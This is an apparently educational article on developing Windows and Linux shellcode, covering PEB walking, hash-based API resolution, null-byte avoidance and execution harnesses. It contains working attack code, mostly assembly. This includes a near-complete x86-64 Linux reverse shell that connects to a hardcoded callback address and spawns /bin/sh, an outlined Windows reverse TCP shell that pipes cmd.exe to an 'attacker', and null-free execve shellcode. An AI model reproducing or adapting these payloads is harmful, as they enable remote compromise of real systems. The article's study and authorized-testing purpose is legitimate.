Ethical Use Only: This advanced content is for authorized security research, penetration testing with explicit permission, and defensive security analysis. Never use these techniques on systems without proper authorization.
The Tale of Two Platforms
Developing shellcode for Windows versus Linux is like speaking two entirely different languages. While the core principles remain the same—position independence, null-byte avoidance, and self-containment—the implementation details are vastly different. This article will teach you to speak both languages fluently.
Linux offers a direct, stable system call interface. It's like having a clear, well-documented API that doesn't change. Windows, on the other hand, forces you to work through high-level libraries that can move around in memory, creating a more complex but ultimately more powerful environment once mastered.
Learning Approach: We'll start with the fundamentals of each platform, build complete working examples, then explore advanced techniques used by professional exploit developers and security researchers.
🔷 Windows Shellcode: The Art of Function Discovery
Windows shellcode development is significantly more complex than Linux because you must dynamically discover and resolve API functions at runtime. However, this complexity brings power—Windows API functions are incredibly feature-rich once you can access them.
The Challenge: No Stable System Calls
Unlike Linux, Windows does not keep its system call numbers stable: they change between releases and even between builds. Shellcode therefore conventionally goes through the documented API functions exported by DLLs such as kernel32.dll. The core challenge is finding those functions in memory when ASLR has randomized where the DLLs are loaded.
First, let's look at the "correct" way to create a process in C using the CreateProcessA function:
/* ANALYSIS: C-level example of process creation on Windows */
#include <windows.h>
#include <stdio.h>
int main(void) {
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    // CreateProcessA may modify the command line, so it must be writable
    char commandLine[] = "notepad.exe";
    if (!CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0,
                        NULL, NULL, &si, &pi)) {
        // GetLastError() returns a DWORD, so print it with %lu
        printf("CreateProcess failed (%lu)\n", GetLastError());
        return 1;
    }
    printf("Process created successfully\n");
    // Wait for process to complete
    WaitForSingleObject(pi.hProcess, INFINITE);
    // Close handles
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
Notice the complexity involved. Now, let's see how shellcode achieves its goals differently.
Part 1: Finding kernel32.dll - The Key to the Kingdom
Nearly every critical Windows API function either lives in kernel32.dll or can be accessed through it (e.g., by using LoadLibraryA to load other DLLs). Our first task is to reliably find the base address of kernel32.dll in memory, regardless of ASLR (Address Space Layout Randomization).
The standard method is the PEB (Process Environment Block) Walk. Every process has a TEB (Thread Environment Block), which can be accessed via the FS register in 32-bit processes or the GS register in 64-bit processes. The TEB contains a pointer to the PEB, which in turn contains a wealth of information about the process, including a list of all loaded modules.
Here is the 32-bit assembly code to perform a PEB walk and retrieve the base address of kernel32.dll:
; find_kernel32.asm (32-bit)
; Returns: EAX = kernel32.dll base address
find_kernel32:
    xor ecx, ecx               ; Zero out ECX (avoids a null byte in the offset)
    mov eax, [fs:ecx + 0x30]   ; EAX = Address of PEB (TEB at FS, PEB pointer at 0x30)
    mov eax, [eax + 0x0C]      ; EAX = PEB->Ldr
    mov eax, [eax + 0x14]      ; EAX = Ldr->InMemoryOrderModuleList.Flink (first entry: the executable)
    ; In a full implementation, we would hash each module name here to find kernel32.dll.
    ; For simplicity, we rely on kernel32.dll usually being the third entry,
    ; so we follow Flink twice from the first entry.
    mov eax, [eax]             ; Second entry (ntdll.dll)
    mov eax, [eax]             ; Third entry (kernel32.dll)
    mov eax, [eax + 0x10]      ; EAX = DllBase (0x10 past InMemoryOrderLinks)
    ret
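Why it's reliable: The TEB and PEB are fundamental to how Windows loads processes, and the offsets used here have stayed the same across 32-bit Windows releases for many years. The weak point is the shortcut of taking the third list entry: load order is a convention rather than a guarantee, so robust shellcode compares a hash of each module's name instead.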
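The pointer chasing is easier to follow outside assembly. The sketch below is a toy model, not a way to read a real process: `memory` is a hypothetical dictionary standing in for the address space, and `fake_process` is an illustrative helper that lays out a three-module list. Only the offsets come from the listings in this article.

```python
# Offsets used by the 32-bit and 64-bit PEB walks shown in this article.
OFFSETS = {
    32: {"peb_ldr": 0x0C, "ldr_list": 0x14, "entry_base": 0x10},
    64: {"peb_ldr": 0x18, "ldr_list": 0x20, "entry_base": 0x20},
}


def walk_modules(memory, peb, bits=32, limit=16):
    """Yield DllBase for each module by following InMemoryOrderModuleList.

    `memory` is a hypothetical dict mapping address -> pointer-sized value.
    """
    off = OFFSETS[bits]
    ldr = memory[peb + off["peb_ldr"]]
    head = ldr + off["ldr_list"]      # the list head lives inside PEB_LDR_DATA
    entry = memory[head]              # Flink of the head = first module
    for _ in range(limit):
        if entry == head:             # circular list: we are back at the head
            break
        yield memory[entry + off["entry_base"]]
        entry = memory[entry]         # follow Flink to the next module


def fake_process(bases, bits=32):
    """Build a toy address space with one list entry per base address."""
    off = OFFSETS[bits]
    peb, ldr = 0x1000, 0x2000
    head = ldr + off["ldr_list"]
    entries = [0x3000 + i * 0x100 for i in range(len(bases))]
    memory = {peb + off["peb_ldr"]: ldr}
    chain = [head] + entries + [head]
    for here, nxt in zip(chain, chain[1:]):
        memory[here] = nxt            # Flink pointers, closing the circle
    for entry, base in zip(entries, bases):
        memory[entry + off["entry_base"]] = base
    return memory, peb


# Made-up base addresses for: the executable, ntdll.dll, kernel32.dll
memory, peb = fake_process([0x00400000, 0x77000000, 0x76000000])
bases = list(walk_modules(memory, peb))
print([hex(b) for b in bases])
```

The third value yielded corresponds to what the assembly returns when it follows Flink twice from the first entry.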
Part 2: Dynamic Function Resolution by Hash
Now that we have the base address of kernel32.dll, we need to find specific functions within it. We can't hardcode addresses because of ASLR, so we use a hashing technique:
- Pre-calculate hashes of the function names we need (e.g., LoadLibraryA, CreateProcessA)
- Walk through the DLL's export table
- Hash each name using the same algorithm
- Compare the runtime hash with our pre-calculated target hash
- If they match, retrieve the address of that function
Here is a simple but effective ROR13 hashing algorithm:
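; A simple ROR13 hashing function
; Input:    ESI = pointer to a null-terminated ASCII string
; Output:   EAX = 32-bit hash
; Clobbers: EDX, ESI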
compute_hash:
xor eax, eax ; Clear EAX to hold the hash
xor edx, edx ; Clear EDX for the character
hash_loop:
mov dl, [esi] ; Get the next character of the function name
test dl, dl ; Check for null terminator
jz hash_finished
ror eax, 13 ; Rotate the hash right by 13 bits
add eax, edx ; Add the character to the hash
inc esi ; Move to the next character
jmp hash_loop
hash_finished:
ret
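The target hashes have to be calculated ahead of time with exactly the same algorithm. A minimal Python sketch of that pre-calculation follows; the function names `ror32` and `ror13_hash` are illustrative, and the routine assumes plain ASCII names hashed without the terminating null, as the assembly above does.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """Mirror the assembly loop: rotate right by 13, then add the character."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


for api in ("LoadLibraryA", "MessageBoxA", "ExitProcess"):
    print(f"{api:<14} 0x{ror13_hash(api):08X}")
```

With this exact algorithm, LoadLibraryA hashes to 0xEC0E4E8E, MessageBoxA to 0xBC4DA2A8, and ExitProcess to 0x73E2D87E. Variants that also fold in the module name or hash uppercase characters produce different constants, so a hash copied from another tool only works with that tool's algorithm.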
And here's the logic to find a function given a target hash:
; find_function_by_hash.asm
; Assumes:
; - EBX = Base address of the target DLL
; - EDI = The pre-calculated hash of the function name we want
; Returns:
; - EAX = Address of the function, or 0 if no exported name matches
; Forwarded exports are not handled in this simplified version.
find_function:
    push esi
    push ecx
    push edx
    mov eax, [ebx + 0x3C]           ; EAX = Offset to PE Header ("PE\0\0")
    mov edx, [ebx + eax + 0x78]     ; EDX = RVA of Export Table
    add edx, ebx                    ; EDX = Address of Export Table
    xor ecx, ecx                    ; ECX = Loop counter / name index
find_loop:
    xor eax, eax                    ; Default result: 0 (not found)
    cmp ecx, [edx + 0x18]           ; Stop once we reach NumberOfNames
    jae find_done
    mov esi, [edx + 0x20]           ; ESI = RVA of AddressOfNames
    add esi, ebx                    ; ESI = Address of AddressOfNames table
    mov esi, [esi + ecx * 4]        ; ESI = RVA of current function name
    add esi, ebx                    ; ESI = Address of current function name
    push edx                        ; compute_hash clobbers EDX
    call compute_hash               ; Hashes string at ESI, result in EAX
    pop edx
    cmp eax, edi                    ; Compare with our target hash
    je found_it
    inc ecx
    jmp find_loop
found_it:
    mov esi, [edx + 0x24]           ; ESI = RVA of AddressOfNameOrdinals
    add esi, ebx
    movzx ecx, word [esi + ecx * 2] ; ECX = Ordinal index for this name
    mov esi, [edx + 0x1C]           ; ESI = RVA of AddressOfFunctions
    add esi, ebx
    mov eax, [esi + ecx * 4]        ; EAX = RVA of the function
    add eax, ebx                    ; EAX = Address of the function
find_done:
    pop edx
    pop ecx
    pop esi
    ret
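The three export tables are linked by index rather than by name, which is easy to lose track of in assembly. The following Python sketch models that indirection with plain lists. The table contents and RVAs are made up for illustration, and `resolve_by_hash` is a hypothetical helper name; a real implementation reads these arrays from the DLL's export directory.

```python
def ror13_hash(name):
    """ROR13 hash: rotate right by 13, then add each ASCII character."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


def resolve_by_hash(names, name_ordinals, functions, target_hash):
    """Mimic the export walk: name index -> ordinal index -> function RVA."""
    for index, name in enumerate(names):
        if ror13_hash(name) == target_hash:
            ordinal = name_ordinals[index]   # AddressOfNameOrdinals[index]
            return functions[ordinal]        # AddressOfFunctions[ordinal]
    return None                              # no exported name matched


# Toy export directory (values are illustrative, not from a real DLL).
names = ["CreateProcessA", "ExitProcess", "LoadLibraryA"]
name_ordinals = [2, 0, 1]
functions = [0x1A2B0, 0x2C3D0, 0x0F1E0]

rva = resolve_by_hash(names, name_ordinals, functions, ror13_hash("LoadLibraryA"))
print(hex(rva))
```

The name table and the function table are not in the same order, which is why the ordinal table sits between them: indexing AddressOfFunctions directly with the name index would return the wrong function.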
Part 3: Practical Examples
Example 1: MessageBoxA Shellcode
This is the "Hello, World!" of Windows shellcode. It's a safe way to test that your function resolution logic is working correctly. It requires loading user32.dll and finding MessageBoxA.
Execution Flow:
- Find kernel32.dll using a PEB walk
- Find the address of LoadLibraryA within kernel32.dll by hash
- Call LoadLibraryA with the string "user32.dll" to load the library
- The return value from LoadLibraryA is the base address of user32.dll
- Find the address of MessageBoxA within user32.dll by hash
- Push the arguments for MessageBoxA onto the stack
- Call the resolved MessageBoxA address
- Find and call ExitProcess to terminate cleanly
; MessageBoxA Shellcode (Conceptual, 32-bit)
; Immediates such as "push 0x00000000" are kept for readability and contain null bytes.
_start:
    ; --- Find kernel32.dll base ---
    call find_kernel32          ; Result: EAX = kernel32.dll base address
    mov ebx, eax                ; EBX = DLL base expected by find_function
    mov ebp, eax                ; EBP = kernel32.dll base, kept for ExitProcess
    ; --- Find LoadLibraryA ---
    mov edi, 0xEC0E4E8E         ; ROR13 hash of "LoadLibraryA"
    call find_function          ; Result: EAX = LoadLibraryA address
    ; --- Load user32.dll ---
    push 0x00006c6c             ; "ll\0\0" (pushed last-chunk-first, little-endian)
    push 0x642e3233             ; "32.d"
    push 0x72657375             ; "user" -> "user32.dll"
    push esp                    ; lpLibFileName = pointer to the string
    call eax                    ; Call LoadLibraryA("user32.dll")
    mov ebx, eax                ; EBX = user32.dll base address
    ; --- Find MessageBoxA ---
    mov edi, 0xBC4DA2A8         ; ROR13 hash of "MessageBoxA"
    call find_function          ; Use user32.dll base in EBX
    mov esi, eax                ; ESI = MessageBoxA address
    ; --- Prepare strings ---
    ; "Hello World!" message
    push 0x00000000             ; Null terminator
    push 0x21646c72             ; "rld!"
    push 0x6f57206f             ; "o Wo"
    push 0x6c6c6548             ; "Hell" -> "Hello World!"
    mov ecx, esp                ; ECX = pointer to message
    ; "Great Binary" title
    push 0x00000000             ; Null terminator
    push 0x7972616e             ; "nary"
    push 0x69422074             ; "t Bi"
    push 0x61657247             ; "Grea" -> "Great Binary"
    mov edx, esp                ; EDX = pointer to title
    ; --- Call MessageBoxA ---
    push 0x00000000             ; uType = MB_OK
    push edx                    ; lpCaption = "Great Binary"
    push ecx                    ; lpText = "Hello World!"
    push 0x00000000             ; hWnd = NULL
    call esi                    ; Call MessageBoxA
    ; --- Find and call ExitProcess ---
    mov ebx, ebp                ; Back to the kernel32.dll base
    mov edi, 0x73E2D87E         ; ROR13 hash of "ExitProcess"
    call find_function          ; Find ExitProcess in kernel32
    push 0x00000000             ; Exit code = 0
    call eax                    ; Call ExitProcess(0)
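Getting the push constants right by hand is error-prone, because the string has to be split into 4-byte chunks, each chunk read as a little-endian integer, and the chunks pushed in reverse order. A small Python sketch of that encoding is shown here; `stack_pushes` is an illustrative helper name, and it pads with null bytes, so the output is not null-free.

```python
import struct


def stack_pushes(text):
    """Return the 32-bit values to push, in push order, for a C string."""
    data = text.encode("ascii") + b"\x00"        # add the terminator
    data += b"\x00" * (-len(data) % 4)           # pad to a multiple of 4 bytes
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downward, so the last chunk is pushed first.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


for value in stack_pushes("user32.dll"):
    print(f"push 0x{value:08x}")
```

For "user32.dll" this prints the values 0x00006c6c, 0x642e3233, and 0x72657375, in that order. After the final push, ESP points at the start of the string.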
Example 2: Windows Reverse TCP Shell
This creates a TCP connection back to an attacker and redirects a command shell through it. This demonstrates the full complexity of Windows shellcode:
; Windows Reverse Shell (High-level flow)
_start:
; 1. Find kernel32.dll base address via PEB walk
call find_kernel32
mov ebx, eax ; EBX = kernel32 base (the input find_function expects)
; 2. Find LoadLibraryA in kernel32.dll
mov edi, 0xEC0E4E8E ; ROR13 hash of "LoadLibraryA"
call find_function
mov [load_library], eax
; 3. Load ws2_32.dll for networking functions
push 0x00006c6c ; "ll\0\0"
push 0x642e3233 ; "32.d"
push 0x5f327377 ; "ws2_" -> "ws2_32.dll"
mov eax, esp
push eax
call [load_library]
mov edi, eax ; Save ws2_32 base in EDI
; 4. Resolve networking functions (WSAStartup, WSASocketA, connect)
; ... (function resolution code) ...
; 5. Initialize Winsock
sub esp, 0x190 ; Allocate space for WSADATA
push esp ; lpWSAData
push 0x0202 ; wVersionRequested (2.2)
call [wsa_startup]
; 6. Create socket
push 0x00000000 ; dwFlags
push 0x00000000 ; g
push 0x00000000 ; lpProtocolInfo
push 0x00000006 ; protocol (TCP)
push 0x00000001 ; type (SOCK_STREAM)
push 0x00000002 ; af (AF_INET)
call [wsa_socket]
mov esi, eax ; Save socket in ESI
; 7. Set up sockaddr_in structure
push 0x0100007f ; sin_addr (127.0.0.1 in little endian)
push 0x5c110002 ; sin_port (4444) + sin_family (AF_INET)
mov edi, esp ; EDI points to sockaddr_in
; 8. Connect to attacker
push 0x00000010 ; namelen (sizeof sockaddr_in)
push edi ; name (sockaddr_in)
push esi ; s (socket)
call [connect]
; 9. Redirect STDIN, STDOUT, STDERR to socket
; No separate API call is needed here. The redirection happens in step 10:
; the socket handle (ESI) is stored in STARTUPINFO.hStdInput, hStdOutput
; and hStdError, and STARTF_USESTDHANDLES is set in STARTUPINFO.dwFlags.
; bInheritHandles must then be TRUE in step 11 so cmd.exe inherits the socket.
; 10. Set up STARTUPINFO for CreateProcessA
; ... (structure setup) ...
; 11. Launch cmd.exe with redirected I/O
push [process_info] ; lpProcessInformation
push [startup_info] ; lpStartupInfo
push 0x00000000 ; lpCurrentDirectory
push 0x00000000 ; lpEnvironment
push 0x00000000 ; dwCreationFlags
push 0x00000001 ; bInheritHandles
push 0x00000000 ; lpThreadAttributes
push 0x00000000 ; lpProcessAttributes
push [cmd_string] ; lpCommandLine ("cmd.exe")
push 0x00000000 ; lpApplicationName
call [create_process]
; 12. Wait for process to exit
push 0xFFFFFFFF ; dwMilliseconds (INFINITE)
push [process_handle] ; hHandle
call [wait_for_single_object]
; 13. Clean up and exit
push 0x00000000 ; uExitCode
call [exit_process]
This creates a fully interactive remote shell, demonstrating the power and complexity of Windows shellcode.
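The two constants pushed for the sockaddr_in structure mix byte orders: the address family is stored in host (little-endian) order, while the port and IP address are in network (big-endian) order. The Python sketch below rebuilds the structure and shows where those constants come from; `sockaddr_in_bytes` is an illustrative helper name.

```python
import socket
import struct


def sockaddr_in_bytes(ip, port):
    """Lay out a 16-byte sockaddr_in as it appears in memory on x86."""
    return (struct.pack("<H", socket.AF_INET)   # sin_family, host byte order
            + struct.pack(">H", port)           # sin_port, network byte order
            + socket.inet_aton(ip)              # sin_addr, network byte order
            + b"\x00" * 8)                      # sin_zero padding


raw = sockaddr_in_bytes("127.0.0.1", 4444)
first, second = struct.unpack("<II", raw[:8])   # read back as two x86 dwords
print(f"push 0x{second:08x}  ; sin_addr")
print(f"push 0x{first:08x}  ; sin_port + sin_family")
```

Reading the first eight bytes back as little-endian dwords gives 0x5c110002 and 0x0100007f, the values used in the listing. Note that 127.0.0.1 unavoidably contains null bytes.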
🔶 Linux Shellcode: The Art of Simplicity
Linux shellcode development is refreshingly direct compared to Windows. Linux offers a stable system call interface that doesn't change between versions, allowing you to request services directly from the kernel without hunting for library functions.
The Linux Advantage: Direct System Calls
The fundamental pattern for executing a command in a Linux shell involves three key system calls: fork(), execve(), and waitpid(). The parent forks, the child replaces itself with the requested program via execve(), and the parent blocks in waitpid() until the child exits.
This C code demonstrates a rudimentary shell that implements this exact pattern:
/*
ANALYSIS:
LANGUAGE: C
GOAL: A simple shell demonstrating the fork/execve/waitpid pattern.
STATUS: Runnable
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>
#define MAX_COMMAND_LENGTH 1024
#define MAX_ARGS 64
int main(void) {
char command[MAX_COMMAND_LENGTH];
char *args[MAX_ARGS];
pid_t pid;
int status;
while (1) {
printf("$ ");
if (fgets(command, sizeof(command), stdin) == NULL) { break; }
command[strcspn(command, "\n")] = 0; // Remove newline
if (strcmp(command, "exit") == 0) { break; }
// Parse command into arguments
int argc = 0;
char *token = strtok(command, " ");
while (token != NULL && argc < MAX_ARGS - 1) {
args[argc++] = token;
token = strtok(NULL, " ");
}
args[argc] = NULL;
if (argc > 0) {
pid = fork();
if (pid == 0) {
// Child process: execute the command
execvp(args[0], args);
perror("execvp failed");
exit(1);
} else if (pid > 0) {
// Parent process: wait for child
waitpid(pid, &status, 0);
} else {
perror("fork failed");
}
}
}
return 0;
}
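The same three-call pattern can be tried from Python, whose `os` module wraps these system calls directly. This is a minimal sketch for Linux, assuming `true` is available on the PATH; `run_command` is an illustrative name and the exit code 127 for a failed exec is a shell convention adopted here, not something the C program above does.

```python
import os


def run_command(argv):
    """Run argv in a child process and return its exit code."""
    pid = os.fork()
    if pid == 0:
        # Child: replace this process image with the requested program.
        try:
            os.execvp(argv[0], argv)
        except OSError:
            os._exit(127)       # exec failed, e.g. command not found
    # Parent: block until the child terminates.
    _, status = os.waitpid(pid, 0)
    if os.WIFEXITED(status):
        return os.WEXITSTATUS(status)
    return -1                   # child was killed by a signal


print(run_command(["true"]))
```

As in the C version, nothing after a successful exec runs in the child, which is why the error path uses `os._exit` rather than returning.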
From C to execve Shellcode
Let's do a complete, hands-on tutorial to convert a simple C program into null-free assembly shellcode. Our goal is a program that executes /bin/sh.
Step 1: The C Program
#include <unistd.h>
int main() {
execve("/bin/sh", NULL, NULL);
return 0;
}
Step 2: First Assembly Attempt (with null-byte flaws)
We translate this to assembly using the execve system call (number 59 on x86-64). This version is logically correct but contains null bytes, making it unsuitable for most exploits.
; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; STATUS: Broken (Contains null bytes)
; GOAL: execve("/bin/sh", NULL, NULL)
section .text
global _start
_start:
; Set up execve system call (BROKEN VERSION)
mov rax, 59 ; execve system call number (contains nulls!)
lea rdi, [rel binsh] ; First argument: pointer to "/bin/sh"
xor rsi, rsi ; Second argument: argv = NULL
xor rdx, rdx ; Third argument: envp = NULL
syscall ; Make the system call
section .data
binsh: db '/bin/sh', 0 ; Null-terminated string (contains null!)
Step 3: The Null-Free Solution
Here's a version that avoids null bytes entirely:
; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; GOAL: A null-free version of execve("/bin/sh", NULL, NULL)
; TECHNIQUES: Stack string construction, register manipulation
section .text
global _start
_start:
; Clear registers without using null bytes
xor rax, rax ; Zero out RAX
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
; Build "/bin/sh" string on the stack
push rdx ; Push null terminator
mov rbx, 0x68732f6e69622f2f ; "//bin/sh" as a little-endian qword (the extra slash pads it to 8 bytes)
push rbx ; Push string onto stack
mov rdi, rsp ; RDI points to our string
; Set up system call number without null bytes
mov al, 59 ; execve system call (only affects lower 8 bits)
; Make the system call
syscall ; Execute /bin/sh
Key Techniques: We use mov al, 59 instead of mov rax, 59 to avoid null bytes, and build the string on the stack instead of using a data section.
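A quick way to confirm that a change actually removed the null bytes is to scan the assembled bytes. The sketch below does that in Python; `find_bad_bytes` is an illustrative helper, and the two byte strings are the standard encodings of `mov eax, 59` (which is what NASM typically emits for `mov rax, 59`) and `mov al, 59`.

```python
def find_bad_bytes(code, bad=b"\x00"):
    """Return (offset, value) for every byte of `code` that appears in `bad`."""
    return [(offset, byte) for offset, byte in enumerate(code) if byte in bad]


mov_eax_59 = bytes.fromhex("b83b000000")   # mov eax, 59
mov_al_59 = bytes.fromhex("b03b")          # mov al, 59

print(find_bad_bytes(mov_eax_59))
print(find_bad_bytes(mov_al_59))
```

The `bad` parameter can hold other characters that a particular input path mangles, for example `b"\x00\x0a\x0d"` when the data passes through line-based parsing.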
Advanced Linux Examples
Linux Reverse Shell
Here's a complete Linux reverse shell that connects back to an attacker:
; Linux Reverse Shell Shellcode (x86-64)
; Connects to 127.0.0.1:4444 and spawns /bin/sh
section .text
global _start
_start:
    ; Step 1: Create a socket
    ; socket(AF_INET, SOCK_STREAM, 0)
    ; x86-64 system call arguments go in RDI, RSI, RDX
    push 41
    pop rax                 ; sys_socket
    push 2
    pop rdi                 ; AF_INET
    push 1
    pop rsi                 ; SOCK_STREAM
    cdq                     ; RDX = 0 (protocol), because EAX is positive
    syscall
    mov rdi, rax            ; Save socket fd in RDI (first argument from here on)
    ; Step 2: Connect to attacker
    ; connect(sockfd, &addr, sizeof(addr))
    ; Build sockaddr_in structure on stack
    xor rax, rax
    push rax                ; sin_zero: 8 bytes of padding
    ; NOTE: 127.0.0.1 and the AF_INET word below encode with null bytes;
    ; a null-free build needs an address without zero octets or an encoder.
    ; sin_addr = 127.0.0.1 (0x0100007f in little endian)
    mov dword [rsp-4], 0x0100007f
    ; sin_port = 4444 (0x115c in big endian) + sin_family = AF_INET (2)
    mov word [rsp-6], 0x5c11 ; Port 4444 in network byte order
    mov word [rsp-8], 0x0002 ; AF_INET
    sub rsp, 8              ; Adjust stack pointer
    mov rsi, rsp            ; RSI points to sockaddr_in
    mov al, 42              ; sys_connect (RAX was zeroed above)
    mov dl, 16              ; sizeof(sockaddr_in)
    syscall
    ; Step 3: Redirect STDIN, STDOUT, STDERR
    ; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    xor rsi, rsi            ; newfd counter; RCX is unusable because syscall overwrites it
dup_loop:
    xor rax, rax
    mov al, 33              ; sys_dup2
    syscall                 ; oldfd = socket (still in RDI), newfd = RSI
    inc rsi
    cmp sil, 3
    jl dup_loop
    ; Step 4: Execute /bin/sh
    ; execve("//bin/sh", NULL, NULL)
    xor rax, rax
    push rax                ; Null terminator
    mov rbx, 0x68732f6e69622f2f ; "//bin/sh" as a little-endian qword
    push rbx
    mov rdi, rsp            ; RDI points to "//bin/sh"
    xor rsi, rsi            ; argv = NULL
    xor rdx, rdx            ; envp = NULL
    mov al, 59              ; sys_execve
    syscall
Building and Testing Linux Shellcode
# Build the shellcode
nasm -f elf64 reverse_shell.asm -o reverse_shell.o
ld reverse_shell.o -o reverse_shell
# Extract raw bytes
objdump -d reverse_shell | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n'
# Create test harness
echo 'unsigned char shellcode[] = "\x48\x31\xc0\x48\x31\xdb...";' > test.c
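Formatting the extracted bytes as a C string by hand invites typos. Assuming the raw bytes are already available (for example, read from a file with `open(path, "rb").read()`), the sketch below produces the array declaration; `to_c_literal` is an illustrative helper name.

```python
def to_c_literal(code, name="shellcode"):
    """Format raw bytes as a C unsigned char array initialised from a string."""
    body = "".join(f"\\x{byte:02x}" for byte in code)
    return f'unsigned char {name}[] = "{body}";'


# 48 31 c0 is the encoding of "xor rax, rax"
print(to_c_literal(bytes.fromhex("4831c0")))
```

Because the initialiser is a string literal, the C compiler appends one extra null byte to the array, which is why the harnesses in this article report `sizeof(shellcode) - 1` as the length.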
Platform Comparison: Key Differences
| Aspect | Windows | Linux |
|---|---|---|
| System Calls | Unstable, undocumented, use APIs instead | Stable, documented, direct usage |
| Function Resolution | PEB walk + hash-based API resolution | Direct system call numbers |
| Complexity | High (hundreds of bytes typical) | Low (dozens of bytes possible) |
| String Handling | Stack construction + UTF-16 considerations | Simple stack construction |
| Process Creation | CreateProcessA with complex structures | Simple execve system call |
| Networking | WinSock API (WSASocket, etc.) | Berkeley sockets (socket, connect, etc.) |
Strategic Insight: Windows shellcode requires more upfront investment to learn but provides access to incredibly powerful APIs. Linux shellcode is faster to develop and typically more compact, making it ideal for size-constrained scenarios.
Testing Your Shellcode
Windows Test Harness
The best way to test is with a simple C/C++ "harness" that allocates a block of executable memory, copies your shellcode into it, and executes it.
// windows_harness.c
#include <windows.h>
#include <stdio.h>
#include <string.h> // memcpy
// Paste your shellcode bytes here
unsigned char shellcode[] = "\x90\x90\x90...";
int main() {
printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
// Allocate memory with Read, Write, and Execute permissions
void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (exec_mem == NULL) {
printf("VirtualAlloc failed: %lu\n", GetLastError());
return 1;
}
// Copy shellcode to executable memory
memcpy(exec_mem, shellcode, sizeof(shellcode));
printf("Executing shellcode at address: %p\n", exec_mem);
// Execute shellcode
((void (*)())exec_mem)();
// Clean up (this may never be reached)
VirtualFree(exec_mem, 0, MEM_RELEASE);
return 0;
}
Linux Test Harness
// linux_harness.c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
// Your shellcode bytes here
unsigned char shellcode[] = "\x48\x31\xc0\x50...";
int main() {
printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
// Allocate executable memory
void *exec_mem = mmap(NULL, sizeof(shellcode),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (exec_mem == MAP_FAILED) {
perror("mmap failed");
return 1;
}
// Copy shellcode
memcpy(exec_mem, shellcode, sizeof(shellcode));
printf("Executing shellcode...\n");
// Execute
((void (*)())exec_mem)();
// Clean up (may not be reached)
munmap(exec_mem, sizeof(shellcode));
return 0;
}
Cross-Platform Development Script
Here's a Python script that automates testing on both platforms:
#!/usr/bin/env python3
"""
Cross-platform shellcode testing framework
Supports both Windows and Linux shellcode development
"""
import platform
import re
import subprocess
import sys
import tempfile

WINDOWS_TEMPLATE = '''
#include <windows.h>
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = "{shellcode}";
int main(void) {{
    void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode),
                                  MEM_COMMIT | MEM_RESERVE,
                                  PAGE_EXECUTE_READWRITE);
    if (!exec_mem) return 1;
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    ((void (*)(void))exec_mem)();
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}}
'''

LINUX_TEMPLATE = '''
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
unsigned char shellcode[] = "{shellcode}";
int main(void) {{
    void *exec_mem = mmap(NULL, sizeof(shellcode),
                          PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) return 1;
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    ((void (*)(void))exec_mem)();
    munmap(exec_mem, sizeof(shellcode));
    return 0;
}}
'''


def create_test_harness(shellcode_bytes, target_os="linux"):
    """Create platform-specific test harness."""
    template = WINDOWS_TEMPLATE if target_os.lower() == "windows" else LINUX_TEMPLATE
    return template.format(shellcode=shellcode_bytes)


def extract_shellcode(binary_path):
    """Return the bytes disassembled by objdump as a string of hex escapes."""
    result = subprocess.run(['objdump', '-d', binary_path],
                            capture_output=True, text=True, check=True)
    escaped = []
    for line in result.stdout.splitlines():
        parts = line.split('\t')
        # Instruction lines look like "  401000:<TAB>48 31 c0 <TAB>xor ..."
        if len(parts) >= 2 and parts[0].strip().endswith(':'):
            for hex_byte in re.findall(r'\b[0-9a-f]{2}\b', parts[1]):
                escaped.append(f"\\x{hex_byte}")
    return ''.join(escaped)


def test_shellcode(binary_path):
    """Extract shellcode from a binary and build a test harness around it."""
    try:
        shellcode_string = extract_shellcode(binary_path)
        print(f"Extracted shellcode: {shellcode_string}")
        # Create test harness
        target_os = "windows" if platform.system() == "Windows" else "linux"
        harness_code = create_test_harness(shellcode_string, target_os)
        # Write and compile
        with tempfile.NamedTemporaryFile(mode='w', suffix='.c', delete=False) as f:
            f.write(harness_code)
            harness_path = f.name
        output_path = harness_path + ('.exe' if target_os == "windows" else '.out')
        compile_cmd = ['gcc', '-o', output_path, harness_path]
        if target_os == "linux":
            compile_cmd[1:1] = ['-z', 'execstack']
        subprocess.run(compile_cmd, check=True)
        print("Test harness compiled successfully!")
        return output_path
    except (OSError, subprocess.CalledProcessError) as e:
        print(f"Error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 test_shellcode.py <binary_path>")
